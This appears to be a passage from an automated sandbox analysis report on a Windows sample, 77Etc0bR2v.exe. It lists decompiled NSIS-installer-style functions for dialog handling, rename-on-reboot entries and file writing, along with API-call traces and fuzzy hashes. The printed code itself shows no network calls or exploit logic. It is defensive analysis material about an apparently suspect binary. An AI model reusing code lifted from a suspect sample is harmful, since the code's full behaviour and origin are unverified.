                                                                                                                        0x00403aac
                                                                                                                        0x00403ab2
                                                                                                                        0x00403abc
                                                                                                                        0x00403ec2
                                                                                                                        0x00403ec8
                                                                                                                        0x00403ed5
                                                                                                                        0x00403edb
                                                                                                                        0x00403edb
                                                                                                                        0x00403ee5
                                                                                                                        0x00000000
                                                                                                                        0x00403ee5
                                                                                                                        0x00403aaa

                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A81
                                                                                                                        • ShowWindow.USER32(?), ref: 00403A9E
                                                                                                                        • 73BC9840.USER32 ref: 00403AB2
                                                                                                                        • SetWindowLongA.USER32 ref: 00403ACE
                                                                                                                        • GetDlgItem.USER32 ref: 00403AEF
                                                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B03
                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403B0A
                                                                                                                        • GetDlgItem.USER32 ref: 00403BB8
                                                                                                                        • GetDlgItem.USER32 ref: 00403BC2
                                                                                                                        • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403BDC
                                                                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C2D
                                                                                                                        • GetDlgItem.USER32 ref: 00403CD3
                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403CF4
                                                                                                                        • EnableWindow.USER32(?,?), ref: 00403D06
                                                                                                                        • EnableWindow.USER32(?,?), ref: 00403D21
                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D37
                                                                                                                        • EnableMenuItem.USER32 ref: 00403D3E
                                                                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D56
                                                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D69
                                                                                                                        • lstrlen.KERNEL32(004204A0,?,004204A0,004236A0), ref: 00403D92
                                                                                                                        • SetWindowTextA.USER32(?,004204A0), ref: 00403DA1
                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00403ED5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$C9840ClassEnabledSystemTextlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 792189959-0
                                                                                                                        • Opcode ID: 5a851e1acd7e9b2c041f37148ddca57ebdb4acb3e701dc7f2e55be9cac4cc860
                                                                                                                        • Instruction ID: 1b558320748e03173a152966608fa9e4bba3452d5179f8dde3fdb5243a6fbb8a
                                                                                                                        • Opcode Fuzzy Hash: 5a851e1acd7e9b2c041f37148ddca57ebdb4acb3e701dc7f2e55be9cac4cc860
                                                                                                                        • Instruction Fuzzy Hash: 21C18071A04204BBDB216F21ED45E2B3E7DEB4970AF40053EF541B12E1C739AA42DB6E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 91%
                                                                                                                        			E00404060(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                                                        				char _v8;
                                                                                                                        				signed int _v12;
                                                                                                                        				void* _v16;
                                                                                                                        				struct HWND__* _t52;
                                                                                                                        				long _t86;
                                                                                                                        				long _t88;
                                                                                                                        				int _t97;
                                                                                                                        				struct HWND__* _t98;
                                                                                                                        				signed int _t99;
                                                                                                                        				intOrPtr _t108;
                                                                                                                        				int _t109;
                                                                                                                        				signed int* _t111;
                                                                                                                        				signed int _t112;
                                                                                                                        				char* _t113;
                                                                                                                        				void* _t114;
                                                                                                                        
                                                                                                                        				if(_a8 != 0x110) {
                                                                                                                        					if(_a8 != 0x111) {
                                                                                                                        						L11:
                                                                                                                        						if(_a8 != 0x4e) {
                                                                                                                        							if(_a8 == 0x40b) {
                                                                                                                        								 *0x420480 =  *0x420480 + 1;
                                                                                                                        							}
                                                                                                                        							L25:
                                                                                                                        							_t109 = _a16;
                                                                                                                        							L26:
                                                                                                                        							return E00403F7F(_a8, _a12, _t109);
                                                                                                                        						}
                                                                                                                        						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                                                        						_t109 = _a16;
                                                                                                                        						if( *((intOrPtr*)(_t109 + 8)) == 0x70b &&  *((intOrPtr*)(_t109 + 0xc)) == 0x201) {
                                                                                                                        							_t99 =  *((intOrPtr*)(_t109 + 0x1c));
                                                                                                                        							_t108 =  *((intOrPtr*)(_t109 + 0x18));
                                                                                                                        							_v12 = _t99;
                                                                                                                        							_v16 = _t108;
                                                                                                                        							_v8 = 0x422e40;
                                                                                                                        							if(_t99 - _t108 < 0x800) {
                                                                                                                        								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                                                        								SetCursor(LoadCursorA(0, 0x7f02));
                                                                                                                        								_t40 =  &_v8; // 0x422e40
                                                                                                                        								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                                                                                                                        								SetCursor(LoadCursorA(0, 0x7f00));
                                                                                                                        								_t109 = _a16;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if( *((intOrPtr*)(_t109 + 8)) != 0x700 ||  *((intOrPtr*)(_t109 + 0xc)) != 0x100) {
                                                                                                                        							goto L26;
                                                                                                                        						} else {
                                                                                                                        							if( *((intOrPtr*)(_t109 + 0x10)) == 0xd) {
                                                                                                                        								SendMessageA( *0x423ea8, 0x111, 1, 0);
                                                                                                                        							}
                                                                                                                        							if( *((intOrPtr*)(_t109 + 0x10)) == 0x1b) {
                                                                                                                        								SendMessageA( *0x423ea8, 0x10, 0, 0);
                                                                                                                        							}
                                                                                                                        							return 1;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					if(_a12 >> 0x10 != 0 ||  *0x420480 != 0) {
                                                                                                                        						goto L25;
                                                                                                                        					} else {
                                                                                                                        						_t111 =  *0x41fc70 + 0x14;
                                                                                                                        						if(( *_t111 & 0x00000020) == 0) {
                                                                                                                        							goto L25;
                                                                                                                        						}
                                                                                                                        						 *_t111 =  *_t111 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                        						E00403F3A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                        						E004042EB();
                                                                                                                        						goto L11;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_t97 = _a16;
                                                                                                                        				_t112 =  *(_t97 + 0x30);
                                                                                                                        				if(_t112 < 0) {
                                                                                                                        					_t112 =  *( *0x42367c - 4 + _t112 * 4);
                                                                                                                        				}
                                                                                                                        				_push( *((intOrPtr*)(_t97 + 0x34)));
                                                                                                                        				_t113 = _t112 +  *0x423ed8;
                                                                                                                        				_push(0x22);
                                                                                                                        				_a16 =  *_t113;
                                                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                                                        				_t114 = _t113 + 1;
                                                                                                                        				_v16 = _t114;
                                                                                                                        				_v8 = E0040402C;
                                                                                                                        				E00403F18(_a4);
                                                                                                                        				_push( *((intOrPtr*)(_t97 + 0x38)));
                                                                                                                        				_push(0x23);
                                                                                                                        				E00403F18(_a4);
                                                                                                                        				CheckDlgButton(_a4, (0 | ( !( *(_t97 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t97 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                                        				E00403F3A( !( *(_t97 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t97 + 0x14) & 0x00000001);
                                                                                                                        				_t98 = GetDlgItem(_a4, 0x3e8);
                                                                                                                        				E00403F4D(_t98);
                                                                                                                        				SendMessageA(_t98, 0x45b, 1, 0);
                                                                                                                        				_t86 =  *( *0x423eb0 + 0x68);
                                                                                                                        				if(_t86 < 0) {
                                                                                                                        					_t86 = GetSysColor( ~_t86);
                                                                                                                        				}
                                                                                                                        				SendMessageA(_t98, 0x443, 0, _t86);
                                                                                                                        				_t88 = SendMessageA(_t98, 0x445, 0, 0x4010000);
                                                                                                                        				 *0x41f464 =  *0x41f464 & 0x00000000;
                                                                                                                        				_push(_t114);
                                                                                                                        				L00405B7C();
                                                                                                                        				SendMessageA(_t98, 0x435, 0, _t88);
                                                                                                                        				SendMessageA(_t98, 0x449, _a16,  &_v16);
                                                                                                                        				 *0x420480 =  *0x420480 & 0x00000000;
                                                                                                                        				return 0;
                                                                                                                        			}



















                                                                                                                        APIs
                                                                                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040EB
                                                                                                                        • GetDlgItem.USER32 ref: 004040FF
                                                                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411D
                                                                                                                        • GetSysColor.USER32(?), ref: 0040412E
                                                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413D
                                                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040414C
                                                                                                                        • lstrlen.KERNEL32(?), ref: 00404156
                                                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404164
                                                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404173
                                                                                                                        • GetDlgItem.USER32 ref: 004041D6
                                                                                                                        • SendMessageA.USER32(00000000), ref: 004041D9
                                                                                                                        • GetDlgItem.USER32 ref: 00404204
                                                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404244
                                                                                                                        • LoadCursorA.USER32 ref: 00404253
                                                                                                                        • SetCursor.USER32(00000000), ref: 0040425C
                                                                                                                        • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040426F
                                                                                                                        • LoadCursorA.USER32 ref: 0040427C
                                                                                                                        • SetCursor.USER32(00000000), ref: 0040427F
                                                                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042AB
                                                                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                        • String ID: @.B$N$open
                                                                                                                        • API String ID: 3615053054-3815657624
                                                                                                                        • Opcode ID: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                                        • Instruction ID: 7761d7a6ce13443680711406d70bf9c6d022160e69bfd2fffc9b265f6460a43d
                                                                                                                        • Opcode Fuzzy Hash: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                                        • Instruction Fuzzy Hash: 4661B2B1A40209BFEB109F60DC45F6A3B69FB44755F10817AFB04BA2D1C7B8A951CF98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E004058B4() {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				intOrPtr* _t15;
                                                                                                                        				long _t16;
                                                                                                                        				int _t20;
                                                                                                                        				void* _t28;
                                                                                                                        				long _t29;
                                                                                                                        				intOrPtr* _t37;
                                                                                                                        				int _t43;
                                                                                                                        				void* _t44;
                                                                                                                        				long _t47;
                                                                                                                        				CHAR* _t49;
                                                                                                                        				void* _t51;
                                                                                                                        				void* _t53;
                                                                                                                        				intOrPtr* _t54;
                                                                                                                        				void* _t55;
                                                                                                                        				void* _t56;
                                                                                                                        
                                                                                                                        				_t15 = E00405E88(1);
                                                                                                                        				_t49 =  *(_t55 + 0x18);
                                                                                                                        				if(_t15 != 0) {
                                                                                                                        					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                                                                                        					if(_t20 != 0) {
                                                                                                                        						L16:
                                                                                                                        						 *0x423f30 =  *0x423f30 + 1;
                                                                                                                        						return _t20;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				 *0x422630 = 0x4c554e;
                                                                                                                        				if(_t49 == 0) {
                                                                                                                        					L5:
                                                                                                                        					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a8, 0x400);
                                                                                                                        					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                                                        						_t43 = wsprintfA(0x421ca8, "%s=%s\r\n", 0x422630, 0x4220a8);
                                                                                                                        						_t56 = _t55 + 0x10;
                                                                                                                        						E00405B88(_t43, 0x400, 0x4220a8, 0x4220a8,  *((intOrPtr*)( *0x423eb0 + 0x128)));
                                                                                                                        						_t20 = E0040583D(0x4220a8, 0xc0000000, 4);
                                                                                                                        						_t53 = _t20;
                                                                                                                        						 *(_t56 + 0x14) = _t53;
                                                                                                                        						if(_t53 == 0xffffffff) {
                                                                                                                        							goto L16;
                                                                                                                        						}
                                                                                                                        						_t47 = GetFileSize(_t53, 0);
                                                                                                                        						_t7 = _t43 + 0xa; // 0xa
                                                                                                                        						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                                                                                        						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                                                                                        							L15:
                                                                                                                        							_t20 = CloseHandle(_t53);
                                                                                                                        							goto L16;
                                                                                                                        						} else {
                                                                                                                        							_push("[Rename]\r\n");
                                                                                                                        							if(E004057B2(_t25, _t51) != 0) {
                                                                                                                        								_push(0x409350);
                                                                                                                        								_t28 = E004057B2(_t26 + 0xa, _t26 + 0xa);
                                                                                                                        								if(_t28 == 0) {
                                                                                                                        									L13:
                                                                                                                        									_t29 = _t47;
                                                                                                                        									L14:
                                                                                                                        									E004057FE(_t51 + _t29, 0x421ca8, _t43);
                                                                                                                        									SetFilePointer(_t53, 0, 0, 0);
                                                                                                                        									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                                                                                                        									GlobalFree(_t51);
                                                                                                                        									goto L15;
                                                                                                                        								}
                                                                                                                        								_t37 = _t28 + 1;
                                                                                                                        								_t44 = _t51 + _t47;
                                                                                                                        								_t54 = _t37;
                                                                                                                        								if(_t37 >= _t44) {
                                                                                                                        									L21:
                                                                                                                        									_t53 =  *(_t56 + 0x14);
                                                                                                                        									_t29 = _t37 - _t51;
                                                                                                                        									goto L14;
                                                                                                                        								} else {
                                                                                                                        									goto L20;
                                                                                                                        								}
                                                                                                                        								do {
                                                                                                                        									L20:
                                                                                                                        									 *((char*)(_t43 + _t54)) =  *_t54;
                                                                                                                        									_t54 = _t54 + 1;
                                                                                                                        								} while (_t54 < _t44);
                                                                                                                        								goto L21;
                                                                                                                        							}
                                                                                                                        							E00405B66(_t51 + _t47, "[Rename]\r\n");
                                                                                                                        							_t47 = _t47 + 0xa;
                                                                                                                        							goto L13;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					CloseHandle(E0040583D(_t49, 0, 1));
                                                                                                                        					_t16 = GetShortPathNameA(_t49, 0x422630, 0x400);
                                                                                                                        					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                                                        						goto L5;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t16;
                                                                                                                        			}






















                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405649,?,00000000,000000F1,?), ref: 00405901
                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 0040590A
                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 00405927
                                                                                                                        • wsprintfA.USER32 ref: 00405945
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004220A8,C0000000,00000004,004220A8,?,?,?,00000000,000000F1,?), ref: 00405980
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 0040598F
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059A5
                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA8,00000000,-0000000A,00409350,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059EB
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004059FD
                                                                                                                        • GlobalFree.KERNEL32 ref: 00405A04
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A0B
                                                                                                                          • Part of subcall function 004057B2: lstrlen.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                                          • Part of subcall function 004057B2: lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                                                        • String ID: %s=%s$0&B$[Rename]
                                                                                                                        • API String ID: 3772915668-951905037
                                                                                                                        • Opcode ID: 05dc510c935a9252d183404297d509aa55311242524adffaf7837e6f51b89b1c
                                                                                                                        • Instruction ID: 8912a0e40cac8f66f34925055924fb713260e7a12edb00ecfb1cfbef244c1689
                                                                                                                        • Opcode Fuzzy Hash: 05dc510c935a9252d183404297d509aa55311242524adffaf7837e6f51b89b1c
                                                                                                                        • Instruction Fuzzy Hash: D9411332B05B11BBD3216B61AD88F6B3A5CDB84715F140136FE05F22C2E678A801CEBD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00405DC8(CHAR* _a4) {
                                                                                                                        				char _t5;
                                                                                                                        				char _t7;
                                                                                                                        				char* _t15;
                                                                                                                        				char* _t16;
                                                                                                                        				CHAR* _t17;
                                                                                                                        
                                                                                                                        				_t17 = _a4;
                                                                                                                        				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                                                        					_t17 =  &(_t17[4]);
                                                                                                                        				}
                                                                                                                        				if( *_t17 != 0 && E004056C6(_t17) != 0) {
                                                                                                                        					_t17 =  &(_t17[2]);
                                                                                                                        				}
                                                                                                                        				_t5 =  *_t17;
                                                                                                                        				_t15 = _t17;
                                                                                                                        				_t16 = _t17;
                                                                                                                        				if(_t5 != 0) {
                                                                                                                        					do {
                                                                                                                        						if(_t5 > 0x1f &&  *((char*)(E00405684("*?|<>/\":", _t5))) == 0) {
                                                                                                                        							E004057FE(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                                                        							_t16 = CharNextA(_t16);
                                                                                                                        						}
                                                                                                                        						_t17 = CharNextA(_t17);
                                                                                                                        						_t5 =  *_t17;
                                                                                                                        					} while (_t5 != 0);
                                                                                                                        				}
                                                                                                                        				 *_t16 =  *_t16 & 0x00000000;
                                                                                                                        				while(1) {
                                                                                                                        					_t16 = CharPrevA(_t15, _t16);
                                                                                                                        					_t7 =  *_t16;
                                                                                                                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					 *_t16 =  *_t16 & 0x00000000;
                                                                                                                        					if(_t15 < _t16) {
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					break;
                                                                                                                        				}
                                                                                                                        				return _t7;
                                                                                                                        			}









                                                                                                                        APIs
                                                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                                        • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                                        • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                        • String ID: "C:\Users\user\Desktop\77Etc0bR2v.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 589700163-81923602
                                                                                                                        • Opcode ID: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                                        • Instruction ID: 3b6179abbfe29fc78842bf11aa846075366cc437f950451d76d565b88bc2b460
                                                                                                                        • Opcode Fuzzy Hash: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                                        • Instruction Fuzzy Hash: A0110861805B9129EB3227284C48BBB7F89CF66754F18447FD8C4722C2C67C5D429FAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00403F7F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                        				struct tagLOGBRUSH _v16;
                                                                                                                        				long _t35;
                                                                                                                        				long _t37;
                                                                                                                        				void* _t40;
                                                                                                                        				long* _t49;
                                                                                                                        
                                                                                                                        				if(_a4 + 0xfffffecd > 5) {
                                                                                                                        					L15:
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                                                        				if(_t49 == 0) {
                                                                                                                        					goto L15;
                                                                                                                        				}
                                                                                                                        				_t35 =  *_t49;
                                                                                                                        				if((_t49[5] & 0x00000002) != 0) {
                                                                                                                        					_t35 = GetSysColor(_t35);
                                                                                                                        				}
                                                                                                                        				if((_t49[5] & 0x00000001) != 0) {
                                                                                                                        					SetTextColor(_a8, _t35);
                                                                                                                        				}
                                                                                                                        				SetBkMode(_a8, _t49[4]);
                                                                                                                        				_t37 = _t49[1];
                                                                                                                        				_v16.lbColor = _t37;
                                                                                                                        				if((_t49[5] & 0x00000008) != 0) {
                                                                                                                        					_t37 = GetSysColor(_t37);
                                                                                                                        					_v16.lbColor = _t37;
                                                                                                                        				}
                                                                                                                        				if((_t49[5] & 0x00000004) != 0) {
                                                                                                                        					SetBkColor(_a8, _t37);
                                                                                                                        				}
                                                                                                                        				if((_t49[5] & 0x00000010) != 0) {
                                                                                                                        					_v16.lbStyle = _t49[2];
                                                                                                                        					_t40 = _t49[3];
                                                                                                                        					if(_t40 != 0) {
                                                                                                                        						DeleteObject(_t40);
                                                                                                                        					}
                                                                                                                        					_t49[3] = CreateBrushIndirect( &_v16);
                                                                                                                        				}
                                                                                                                        				return _t49[3];
                                                                                                                        			}









                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2320649405-0
                                                                                                                        • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                        • Instruction ID: 4cc26f8bf5fc777f430f8318c3ba194748f169832e683f7fcd21add738ba3f9d
                                                                                                                        • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                        • Instruction Fuzzy Hash: C221C371904705ABCB209F78DD08B4BBBF8AF40711F048A29F992F26E0C738E904CB55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 93%
                                                                                                                        			E0040267C(struct _OVERLAPPED* __ebx) {
                                                                                                                        				void* _t27;
                                                                                                                        				long _t32;
                                                                                                                        				struct _OVERLAPPED* _t47;
                                                                                                                        				void* _t51;
                                                                                                                        				void* _t53;
                                                                                                                        				void* _t56;
                                                                                                                        				void* _t57;
                                                                                                                        				void* _t58;
                                                                                                                        
                                                                                                                        				_t47 = __ebx;
                                                                                                                        				 *(_t58 - 8) = 0xfffffd66;
                                                                                                                        				_t52 = E004029F6(0xfffffff0);
                                                                                                                        				 *(_t58 - 0x44) = _t24;
                                                                                                                        				if(E004056C6(_t52) == 0) {
                                                                                                                        					E004029F6(0xffffffed);
                                                                                                                        				}
                                                                                                                        				E0040581E(_t52);
                                                                                                                        				_t27 = E0040583D(_t52, 0x40000000, 2);
                                                                                                                        				 *(_t58 + 8) = _t27;
                                                                                                                        				if(_t27 != 0xffffffff) {
                                                                                                                        					_t32 =  *0x423eb4;
                                                                                                                        					 *(_t58 - 0x2c) = _t32;
                                                                                                                        					_t51 = GlobalAlloc(0x40, _t32);
                                                                                                                        					if(_t51 != _t47) {
                                                                                                                        						E004031F1(_t47);
                                                                                                                        						E004031BF(_t51,  *(_t58 - 0x2c));
                                                                                                                        						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                                                                                                                        						 *(_t58 - 0x30) = _t56;
                                                                                                                        						if(_t56 != _t47) {
                                                                                                                        							E00402F18(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                                                                                                                        							while( *_t56 != _t47) {
                                                                                                                        								_t49 =  *_t56;
                                                                                                                        								_t57 = _t56 + 8;
                                                                                                                        								 *(_t58 - 0x38) =  *_t56;
                                                                                                                        								E004057FE( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                                                                                                        								_t56 = _t57 +  *(_t58 - 0x38);
                                                                                                                        							}
                                                                                                                        							GlobalFree( *(_t58 - 0x30));
                                                                                                                        						}
                                                                                                                        						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                                                                                                                        						GlobalFree(_t51);
